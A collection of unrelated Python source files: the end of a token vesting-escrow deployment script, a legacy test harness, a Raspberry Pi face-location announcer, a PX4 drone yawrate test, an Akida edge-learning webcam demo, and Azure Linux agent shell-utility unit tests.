# burn all the admin accounts!
tx = vesting_escrow.disable_fund_admins({"from": admin, "required_confs": confs})
_log_tx(txid=tx.txid, fn_name=tx.fn_name)
vesting_escrow.commit_transfer_ownership(
"0x000000000000000000000000000000000000dead", {"from": admin, "required_confs": confs}
)
_log_tx(txid=tx.txid, fn_name=tx.fn_name)
vesting_escrow.apply_transfer_ownership({"from": admin, "required_confs": confs})
_log_tx(txid=tx.txid, fn_name=tx.fn_name)
gas_used = sum(i.gas_used for i in history[start_idx:])
print(f"Distribution complete! Total gas used: {gas_used}")
# return the final vested amounts to be used in `sanity_check`, if desired
return vesting_escrow, vested_amounts
def sanity_check(vesting_address, vested_amounts):
vesting_escrow = VestingEscrow.at(vesting_address)
if vesting_escrow.initial_locked_supply() != TOTAL_AMOUNT:
raise ValueError(f"Unexpected locked supply: {vesting_escrow.initial_locked_supply()}")
if vesting_escrow.unallocated_supply() != 0:
raise ValueError(f"Unallocated supply remains: {vesting_escrow.unallocated_supply()}")
for count, (acct, expected) in enumerate(vested_amounts, start=1):
balance = vesting_escrow.initial_locked(acct)
if balance != expected:
raise ValueError(
f"Incorrect vested amount for {acct} - expected {expected}, got {balance}"
)
if not count % 250:
print(f"{count}/{len(vested_amounts)} balances verified...")
print("Sanity check passed!")
|
testplus.py
|
#
# The contents of this file are subject to the Mozilla Publics
# License Version 1.1 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of
# the License at http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS
# IS" basis, WITHOUT WARRANTY OF ANY KIND, either express or
# implied. See the License for the specific language governing
# rights and limitations under the License.
#
# The Original Code is "Java-Python Extension: testplus (JPE-testplus)".
#
# The Initial Developer of the Original Code is Frederic Bruno Giacometti.
# Portions created by Frederic Bruno Giacometti are
# Copyright (C) 2002 Frederic Bruno Giacometti. All Rights Reserved.
#
# Contributor: Frederic Giacometti, frederic.giacometti@arakne.com
#
from __future__ import nested_scopes
import re, sys, os, operator, types
def chdir(directory=None):
if directory is None:
if len(sys.argv):
directory = os.path.split(sys.argv[0])[0]
if len(directory):
os.chdir(directory)
def logfile():
global __logfile
try:
return __logfile
except NameError:
# add the regression directory to the path so that data files are
# found in the local directory
cwd = os.getcwd()
direc = os.path.split(sys.argv[0])[0]
if os.name == 'nt': #sys.platform == 'win32':
direc = direc.replace( '/', '\\')
if cwd[-len(direc):]!=direc:
d = os.path.join( os.getcwd(), os.path.split(sys.argv[0])[0] )
__logfile = open( sys.argv[ 0] + '.log', 'w')
else:
d = cwd
__logfile = open( os.path.split(sys.argv[0])[1] + '.log', 'w')
sys.path.append( d )
return __logfile
## connect, disconnect and fun are 3 tuple (fun, args, kw) OR just a function
class TestHarness:
def __init__( self,
name,
funs = [],
dependents = [],
connect = (lambda : None, (), {} ),
disconnect = (lambda : None, (), {} ) ):
self.name = name
self.funs = funs
self.dependents = dependents
self.connect = connect
self.disconnect = disconnect
self.count = 0
def __call__( self, fun):
try:
if type(fun)==types.TupleType:
func = fun[0]
args = fun[1]
kw = fun[2]
else:
func = fun
args = ()
kw = {}
apply( func, args, kw)
except:
return fun, sys.exc_info()
else:
return None
def __getattr__( self, attr):
if attr == 'failures':
result = filter( None, self.dependents)
if not result:
fail = self( self.connect )
if fail:
result = [fail]
else:
for fun in self.funs:
self.count += 1
testname = 'TEST%4i %s.%s ' % (self.count,
self.name,
fun.func_name)
if len(testname) < 70:
testname = testname + ' '*(65-len(testname))
print testname,
prevstdout = sys.stdout
#prevstderr = sys.stderr
sys.stdout = logfile() # sys.stderr = logfile()
try:
print testname
sys.stdout.flush()
res = self( fun)
result.append( res )
sys.stdout.flush()
finally:
sys.stdout = prevstdout
#sys.stderr = prevstderr
if res is None:
print 'PASSED'
else:
print 'FAILED'
result.append( self( self.disconnect))
result = filter( None, result)
else:
raise AttributeError( attr)
setattr( self, attr, result)
return result
def __len__( self):
return len( [x
for x in self.failures
if not isinstance( x, TestHarness)])\
+ reduce( operator.add,
[len( x)
for x in self.failures
if isinstance( x, TestHarness)],
0)
def __str__( self):
from os import path
klass = self.__class__
return '\n'.join( ['LOGFILE is <%s>' % path.abspath( logfile().name),
'\nTEST HARNESS %s: %s error%s'
' out of %i tests:'
% (self.name, len( self) or 'SUCCESS - no',
1 < len( self) and 's' or '',
self.totalcount())]
+ [re.sub( '\n', '\n ',
isinstance( x, TestHarness)
and str( x) or apply( self.error2str, x))
for x in self.failures] + [''])
def error2str( self, fun, (exctype, excvalue, tb)):
import traceback
return '\n%s:\n <%s>\n' % (exctype, excvalue)\
+ ''.join( traceback.format_tb( tb.tb_next))
def totalcount( self):
return reduce( operator.add,
[x.totalcount() for x in self.dependents],
self.count)
def testcollect( globs,
matchfun = lambda x: re.match( 'test', x)):
from inspect import getfile, getsourcelines
result = [x[ 1]
for x in globs.items()
if callable( x[ 1]) and matchfun( x[ 0])]
result.sort( lambda x, y: cmp( (getfile( x), getsourcelines( x)[ -1]),
(getfile( y), getsourcelines( y)[ -1])))
return result
##def timerun( fun, timeout = None, endcallback = lambda : None):
## import threading
## print 'aaaa'
## subthread = threading.Thread( target = fun)
## subthread.setDaemon( 1)
## subthread.start()
## #outer = threading.Timer( timeout, sys.exit)
## print 'bbbb', timeout
## subthread.join( timeout)
## print 'cccc'
def prun( args = sys.argv[ 1:]):
# win323 loses the stderr for subprocesses ... ?!
sys.stderr = sys.stdout
globs = {}
try:
for cmd in args:
exec cmd in globs
except SystemExit:
raise
except:
import traceback
traceback.print_stack()
traceback.print_exc()
sys.exit( 1)
|
facedetect.py
|
import setproctitle #Set process name to something easily killable
from threading import Thread
import cv2
import os
import subprocess #so I can run subprocesses in the background if I want
#import ConfigParser #To read the config file modified by menu.py
from subprocess import call #to call a process in the foreground
import csv #To make an array of the certainty and identity results so we can find the top matches
from operator import itemgetter
import time
class Facedetect:
def __init__(self, cam, cfg):
self.cam = cam
self.Config = cfg
self.faceframe = "/dev/shm/face_frame" #Signal to the FacialDetectionProcess that a frame is available
self.faceimg = "/dev/shm/face.jpg" #The frame
self.classify = "/dev/shm/face.txt" #position of face detected if detected
self.facetext = "/dev/shm/face_text" #FacialDetectionProcess creates this can be fetched
self.running = False
def start(self):
if (os.path.exists(self.faceframe)):
os.remove(self.faceframe)
if (os.path.exists(self.faceimg)):
os.remove(self.faceimg)
if (os.path.exists(self.facetext)):
os.remove(self.facetext)
if (os.path.exists(self.classify)):
os.remove(self.classify)
print "launching face detect analysis"
time.sleep(1)
subprocess.Popen(["sudo","python", "/home/pi/webcam_face_detection/cam.py","--face","/home/pi/webcam_face_detection/cascades/haarcascade_frontalface_default.xml"])
self.running = True
t = Thread(target=self.worker, args=())
t.start()
def worker(self):
while True:
if not self.running:
return
if (not os.path.exists(self.faceframe)):
print "face frame file not detected generating face.jpg"
res = cv2.resize(self.cam.read(), (640, 480), interpolation =cv2.INTER_AREA)
cv2.imwrite(self.faceimg, res)
os.mknod(self.faceframe)
continue
if (os.path.exists(self.facetext)):
print "reading report from face detect analysis"
time.sleep(0.5)
data = csv.reader(open('/dev/shm/face.txt', 'rb'), delimiter=",", quotechar='|')
locX, locY, H, W, xres, yres = [], [], [], [], [], []
for row in data:
locX.append(row[0])
locY.append(row[1])
H.append(row[2])
W.append(row[3])
xres.append(row[4])
yres.append(row[5])
print "x Location",locX
print "y Location",locY
print "rect height", H
print "rect width", W
print "xres ", xres
print "yres ",yres
locX = [int(i) for i in locX]
locX = locX[0]
locY = [int(i) for i in locY]
locY = locY[0]
H = [int(i) for i in H]
H = H[0]
W = [int(i) for i in W]
W = W[0]
xres = [int(i) for i in xres]
xres = xres[0]
yres = [int(i) for i in yres]
yres = yres[0]
centeredX = locX + (W * 0.5) # Center X of box
centeredY = locY + (H *0.5) #Center Y of box
print "centered X",centeredX
print "centered Y", centeredY
bottomthirdY = 0.33*yres #split total y resolution into thirds
midthirdY = 0.66*yres
topthirdY = yres
leftthirdX = 0.33*xres #split x resolution into thirds
midthirdX = 0.66*xres
rightthirdX = xres
#Now we can classify an x and y position based on grid locations in thirds
xstring = ""
ystring = ""
espeakstring = ""
if locX == 0 and locY == 0:
espeakstring = "" #This is what happens when no image gets processed, or no face is detected.
xstring = ""
ysrting = ""
else:
espeakstring = "face at" #if there are other values, there is a face detected
if centeredX > 0 and centeredX < leftthirdX:
xstring = "left"
elif centeredX > leftthirdX and centeredX < midthirdX:
xstring = "Center"
elif centeredX > midthirdX and centeredX < rightthirdX:
xstring = "right"
if centeredY > 0 and centeredY < bottomthirdY: #Note due to the x,y coord system in opencv the y axis thirds are reversed compared to many other systems
ystring = "Upper"
elif centeredY > bottomthirdY and centeredY < midthirdY:
ystring = "mid"
elif centeredY > midthirdY and centeredY < topthirdY:
ystring = "Lower"
espeakstring = espeakstring + xstring + ystring # read location and size
print "trying to read location and size"
espeak_process = subprocess.Popen(["espeak",espeakstring, "--stdout"], stdout=subprocess.PIPE)
aplay_process = subprocess.Popen(["aplay", "-D", "sysdefault"], stdin=espeak_process.stdout, stdout=subprocess.PIPE)
aplay_process.wait()#wait to speak location
call (["sudo","rm","-rf","/dev/shm/face.txt"]) #remove last run of facial detection info
os.remove(self.facetext)
def stop(self):
self.running = False
call (["sudo","killall","FacialDetectProcess"]) #Kills Facial Detection Process loop
|
yaw_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2020 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Pedro Roque <padr@kth.se>
#
from __future__ import division
PKG = 'px4'
import rospy
from geometry_msgs.msg import Quaternion, Vector3
from mavros_msgs.msg import AttitudeTarget
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from six.moves import xrange
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardYawrateTest(MavrosTestCommon):
"""
Tests flying in offboard control by sending a Roll Pitch Yawrate Thrust (RPYrT)
as attitude setpoint.
For the test to be successful it needs to achieve a desired yawrate and height.
"""
def setUp(self):
super(MavrosOffboardYawrateTest, self).setUp()
self.att = AttitudeTarget()
self.att_setpoint_pub = rospy.Publisher(
'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)
# send setpoints in seperate thread to better prevent failsafe
self.att_thread = Thread(target=self.send_att, args=())
self.att_thread.daemon = True
self.att_thread.start()
# desired yawrate target
self.des_yawrate = 0.1
self.yawrate_tol = 0.02
def tearDown(self):
super(MavrosOffboardYawrateTest, self).tearDown()
#
# Helper methods
#
def send_att(self):
rate = rospy.Rate(10) # Hz
self.att.body_rate = Vector3()
self.att.header = Header()
self.att.header.frame_id = "base_footprint"
self.att.orientation = self.local_position.pose.orientation
self.att.body_rate.x = 0
self.att.body_rate.y = 0
self.att.body_rate.z = self.des_yawrate
self.att.thrust = 0.59
self.att.type_mask = 3 # ignore roll and pitch rate
while not rospy.is_shutdown():
self.att.header.stamp = rospy.Time.now()
self.att_setpoint_pub.publish(self.att)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
#
# Test method
#
def test_attctl(self):
"""Test offboard yawrate control"""
# boundary to cross
# Stay leveled, go up, and test yawrate
boundary_x = 5
boundary_y = 5
boundary_z = 10
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
10, -1)
self.log_topic_vars()
self.set_arm(True, 5)
self.set_mode("OFFBOARD", 5)
rospy.loginfo("run mission")
rospy.loginfo("attempting to cross boundary | z: {2} , stay within x: {0} y: {1} \n and achieve {3} yawrate".
format(boundary_x, boundary_y, boundary_z, self.des_yawrate))
# does it cross expected boundaries in 'timeout' seconds?
timeout = 90 # (int) seconds
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
crossed = False
for i in xrange(timeout * loop_freq):
if (self.local_position.pose.position.x < boundary_x and
self.local_position.pose.position.x > -boundary_x and
self.local_position.pose.position.y < boundary_y and
self.local_position.pose.position.y > -boundary_y and
self.local_position.pose.position.z > boundary_z and
abs(self.imu_data.angular_velocity.z - self.des_yawrate) < self.yawrate_tol):
rospy.loginfo("Test successful. Final altitude and yawrate achieved")
crossed = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(crossed, (
"took too long to finish test | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} \n " \
" | current att qx: {3:.2f}, qy: {4:.2f}, qz: {5:.2f} qw: {6:.2f}, yr: {7:.2f}| timeout(seconds): {8}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z,
self.imu_data.orientation.x,
self.imu_data.orientation.y,
self.imu_data.orientation.z,
self.imu_data.orientation.w,
self.imu_data.angular_velocity.z,
timeout)))
self.set_mode("AUTO.LAND", 5)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
90, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_yawrate_test',
MavrosOffboardYawrateTest)
|
akida_camera.py
|
import time
import os
import cv2
import threading
from imutils.video import VideoStream
from tensorflow.keras.preprocessing.image import img_to_array
import numpy as np
from pynput import keyboard
from akida_models import mobilenet_edge_imagenet_pretrained
from cnn2snn import convert
from akida import Model, FullyConnected
OUTPUT = False
OUTPUT_VID = "out.avi"
OUTPUT_FPS = 30
MODEL_FBZ = "models/edge_learning_example.fbz"
CAMERA_SRC = 0
INFERENCE_PER_SECOND = 1
TEXT_COLOUR = (190, 30, 255)
NUM_NEURONS_PER_CLASS = 1
NUM_WEIGHTS = 350
NUM_CLASSES = 10
FRAME_WIDTH = 640
FRAME_HEIGHT = 480
TARGET_WIDTH = 224
TARGET_HEIGHT = 224
NEURON_KEYS = [str(i) for i in range(10)]
SAVE_BUTTON = "s"
LABELS = {0: "Background"}
SAVED = []
SHOTS = {}
class Controls:
"""
Class to capture key presses to save/learn
"""
def __init__(self, inference):
self.listener = keyboard.Listener(
on_press=self.on_press, on_release=self.on_release
)
self.listener.start()
self.inference = inference
def on_press(self, key):
try:
if key.char in NEURON_KEYS:
print("learned class {}".format(int(key.char)))
self.inference.learn(int(key.char))
if key.char == SAVE_BUTTON:
print("saved model to {}".format(MODEL_FBZ))
self.inference.save()
except AttributeError:
pass
def on_release(self, key):
if key == keyboard.Key.esc:
return False
class Camera:
"""
Class to capture video feed from webcam
"""
def __init__(self):
self.stream = VideoStream(
src=CAMERA_SRC, resolution=(FRAME_WIDTH, FRAME_HEIGHT)
).start()
self.label = ""
self.shots = ""
self.text_display_timer = 0
if OUTPUT:
self.out = cv2.VideoWriter(
OUTPUT_VID,
cv2.VideoWriter_fourcc("M", "J", "P", "G"),
OUTPUT_FPS,
(FRAME_WIDTH, FRAME_HEIGHT),
)
def get_frame(self):
frame = cv2.resize(self.stream.read(), (TARGET_WIDTH, TARGET_HEIGHT))
return frame
def get_input_array(self):
frame = cv2.resize(self.stream.read(), (TARGET_WIDTH, TARGET_HEIGHT))
input_array = img_to_array(frame)
input_array = np.array([input_array], dtype="uint8")
return input_array
def show_frame(self):
frame = self.label_frame(self.stream.read())
if OUTPUT:
self.out.write(frame)
cv2.imshow("frame", frame)
key = cv2.waitKey(20) & 0xFF
def label_frame(self, frame):
frame = cv2.putText(
frame,
str(self.label),
(10, 40),
cv2.FONT_HERSHEY_SIMPLEX,
1.2,
TEXT_COLOUR,
1,
cv2.LINE_AA,
)
frame = cv2.putText(
frame,
str(self.shots),
(10, 75),
cv2.FONT_HERSHEY_SIMPLEX,
0.7,
TEXT_COLOUR,
1,
cv2.LINE_AA,
)
return frame
class Inference:
"""
Class to run inference over frames from the webcam
"""
def __init__(self, camera):
# create a model if one doesnt exist
if not os.path.exists(MODEL_FBZ):
print("Initialising Akida model")
self.initialise()
self.camera = camera
# run inference in separate thread
self.t1 = threading.Thread(target=self.infer)
self.t1.start()
# load the akida model
self.model_ak = Model(filename=MODEL_FBZ)
def initialise(self):
"""
Method to initialise an Akida model if one doesn't exist
"""
# fetch pretrained imagenet
model_keras = mobilenet_edge_imagenet_pretrained()
# convert it to an Akida model
model_ak = convert(model_keras)
# remove the last layer of network, replace with Akida learning layer
model_ak.pop_layer()
layer_fc = FullyConnected(
name="akida_edge_layer",
units=NUM_CLASSES * NUM_NEURONS_PER_CLASS,
activation=False,
)
# add learning layer to end of model
model_ak.add(layer_fc)
model_ak.compile(
num_weights=NUM_WEIGHTS, num_classes=NUM_CLASSES, learning_competition=0.1
)
# save new model
model_ak.save(MODEL_FBZ)
def infer(self):
while True:
input_array = camera.get_input_array()
predictions = self.model_ak.predict(input_array, num_classes=NUM_CLASSES)
if predictions[0] in SAVED:
self.camera.label = LABELS.get(predictions[0], predictions[0])
self.camera.shots = "{} shot/s".format(SHOTS.get(predictions[0]))
time.sleep(1 / INFERENCE_PER_SECOND)
def learn(self, neuron):
if neuron not in SAVED:
SAVED.append(neuron)
SHOTS[neuron] = 1
else:
SHOTS[neuron] += 1
input_array = self.camera.get_input_array()
self.model_ak.fit(input_array, neuron)
self.camera.label = "Learned {}".format(LABELS.get(neuron, neuron))
def save(self):
self.model_ak.save(MODEL_FBZ)
camera = Camera()
inference = Inference(camera)
controls = Controls(inference)
while True:
camera.show_frame()
|
test_shell_util.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import signal
import tempfile
import threading
import unittest
from azurelinuxagent.common.future import ustr
import azurelinuxagent.common.utils.shellutil as shellutil
from tests.tools import AgentTestCase, patch
from tests.utils.miscellaneous_tools import wait_for, format_processes
class ShellQuoteTestCase(AgentTestCase):
def test_shellquote(self):
self.assertEqual("\'foo\'", shellutil.quote("foo"))
self.assertEqual("\'foo bar\'", shellutil.quote("foo bar"))
self.assertEqual("'foo'\\''bar'", shellutil.quote("foo\'bar"))
class RunTestCase(AgentTestCase):
def test_it_should_return_the_exit_code_of_the_command(self):
exit_code = shellutil.run("exit 123")
self.assertEqual(123, exit_code)
def test_it_should_be_a_pass_thru_to_run_get_output(self):
with patch.object(shellutil, "run_get_output", return_value=(0, "")) as mock_run_get_output:
shellutil.run("echo hello word!", chk_err=False, expected_errors=[1, 2, 3])
self.assertEqual(mock_run_get_output.call_count, 1)
args, kwargs = mock_run_get_output.call_args
self.assertEqual(args[0], "echo hello word!")
self.assertEqual(kwargs["chk_err"], False)
self.assertEqual(kwargs["expected_errors"], [1, 2, 3])
class RunGetOutputTestCase(AgentTestCase):
def test_run_get_output(self):
output = shellutil.run_get_output(u"ls /")
self.assertNotEqual(None, output)
self.assertEqual(0, output[0])
err = shellutil.run_get_output(u"ls /not-exists")
self.assertNotEqual(0, err[0])
err = shellutil.run_get_output(u"ls 我")
self.assertNotEqual(0, err[0])
def test_it_should_log_the_command(self):
command = "echo hello world!"
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command)
self.assertEqual(mock_logger.verbose.call_count, 1)
args, kwargs = mock_logger.verbose.call_args # pylint: disable=unused-variable
command_in_message = args[1]
self.assertEqual(command_in_message, command)
def test_it_should_log_command_failures_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False)
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
def test_it_should_log_expected_errors_as_info(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code])
self.assertEqual(mock_logger.info.call_count, 1)
args, _ = mock_logger.info.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any errors. Got: {0}".format(mock_logger.error.call_args_list))
def test_it_should_log_unexpected_errors_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code + 1])
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
# R0904: Too many public methods (24/20) -- disabled: each method is a unit test
class RunCommandTestCase(AgentTestCase): # pylint: disable=R0904
"""
Tests for shellutil.run_command/run_pipe
"""
def __create_tee_script(self, return_code=0):
"""
Creates a Python script that tees its stdin to stdout and stderr
"""
tee_script = os.path.join(self.tmp_dir, "tee.py")
AgentTestCase.create_script(tee_script, """
import sys
for line in sys.stdin:
sys.stdout.write(line)
sys.stderr.write(line)
exit({0})
""".format(return_code))
return tee_script
def test_run_command_should_execute_the_command(self):
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
def test_run_pipe_should_execute_a_pipe_with_two_commands(self):
# Output the same string 3 times and then remove duplicates
test_string = "A TEST STRING\n"
pipe = [["echo", "-n", "-e", test_string * 3], ["uniq"]]
output = shellutil.run_pipe(pipe)
self.assertEqual(output, test_string)
def test_run_pipe_should_execute_a_pipe_with_more_than_two_commands(self):
#
# The test pipe splits the output of "ls" in lines and then greps for "."
#
# Sample output of "ls -d .":
# drwxrwxr-x 13 nam nam 4096 Nov 13 16:54 .
#
pipe = [["ls", "-ld", "."], ["sed", "-r", "s/\\s+/\\n/g"], ["grep", "\\."]]
output = shellutil.run_pipe(pipe)
self.assertEqual(".\n", output, "The pipe did not produce the expected output. Got: {0}".format(output))
def __it_should_raise_an_exception_when_the_command_fails(self, action):
with self.assertRaises(shellutil.CommandError) as context_manager:
action()
exception = context_manager.exception
self.assertIn("tee.py", str(exception), "The CommandError does not include the expected command")
self.assertEqual(1, exception.returncode, "Unexpected return value from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stdout, "Unexpected stdout from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stderr, "Unexpected stderr from the test pipe")
def test_run_command_should_raise_an_exception_when_the_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_command(tee_script, input="TEST_STRING\n"))
def test_run_pipe_should_raise_an_exception_when_the_last_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_pipe([["echo", "-n", "TEST_STRING\n"], [tee_script]]))
def __it_should_raise_an_exception_when_it_cannot_execute_the_command(self, action):
with self.assertRaises(Exception) as context_manager:
action()
exception = context_manager.exception
self.assertIn("No such file or directory", str(exception))
def test_run_command_should_raise_an_exception_when_it_cannot_execute_the_command(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_command("nonexistent_command"))
def test_run_pipe_should_raise_an_exception_when_it_cannot_execute_the_pipe(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_pipe([["ls", "-ld", "."], ["nonexistent_command"], ["wc", "-l"]]))
def __it_should_not_log_by_default(self, action):
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
try:
action()
except Exception:
pass
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any WARNINGS; Got: {0}".format(mock_logger.warn.call_args))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any ERRORS; Got: {0}".format(mock_logger.error.call_args))
def test_run_command_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_command(["ls", "nonexistent_file"])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_command("nonexistent_command")) # Raises an OSError
def test_run_pipe_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], [self.__create_tee_script(return_code=1)]])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], ["nonexistent_command"]])) # Raises an OSError
def __it_should_log_an_error_when_log_error_is_set(self, action, command):
with patch("azurelinuxagent.common.utils.shellutil.logger.error") as mock_log_error:
try:
action()
except Exception:
pass
self.assertEqual(mock_log_error.call_count, 1)
args, _ = mock_log_error.call_args
self.assertTrue(any(command in str(a) for a in args), "The command was not logged")
self.assertTrue(any("2" in str(a) for a in args), "The command's return code was not logged") # errno 2: No such file or directory
def test_run_command_should_log_an_error_when_log_error_is_set(self):
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command(["ls", "file-does-not-exist"], log_error=True), # Raises a CommandError
command="ls")
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command("command-does-not-exist", log_error=True), # Raises a CommandError
command="command-does-not-exist")
def test_run_command_should_raise_when_both_the_input_and_stdin_parameters_are_specified(self):
with tempfile.TemporaryFile() as input_file:
with self.assertRaises(ValueError):
shellutil.run_command(["cat"], input='0123456789ABCDEF', stdin=input_file)
def test_run_command_should_read_the_command_input_from_the_input_parameter_when_it_is_a_string(self):
command_input = 'TEST STRING'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_stdin_from_the_input_parameter_when_it_is_a_sequence_of_bytes(self):
command_input = 'TEST BYTES'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def __it_should_read_the_command_input_from_the_stdin_parameter(self, action):
command_input = 'TEST STRING\n'
with tempfile.TemporaryFile() as input_file:
input_file.write(command_input.encode())
input_file.seek(0)
output = action(stdin=input_file)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_command(["cat"], stdin=stdin))
def test_run_pipe_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_pipe([["cat"], ["sort"]], stdin=stdin))
def __it_should_write_the_command_output_to_the_stdout_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
captured_output = action(stdout=output_file)
output_file.seek(0)
command_output = ustr(output_file.read(), encoding='utf-8', errors='backslashreplace')
self.assertEqual(command_output, "TEST STRING\n", "The command did not produce the correct output; the output should match the input")
self.assertEqual("", captured_output, "No output should have been captured since it was redirected to a file. Output: [{0}]".format(captured_output))
def test_run_command_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_command(["echo", "TEST STRING"], stdout=stdout))
def test_run_pipe_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_pipe([["echo", "TEST STRING"], ["sort"]], stdout=stdout))
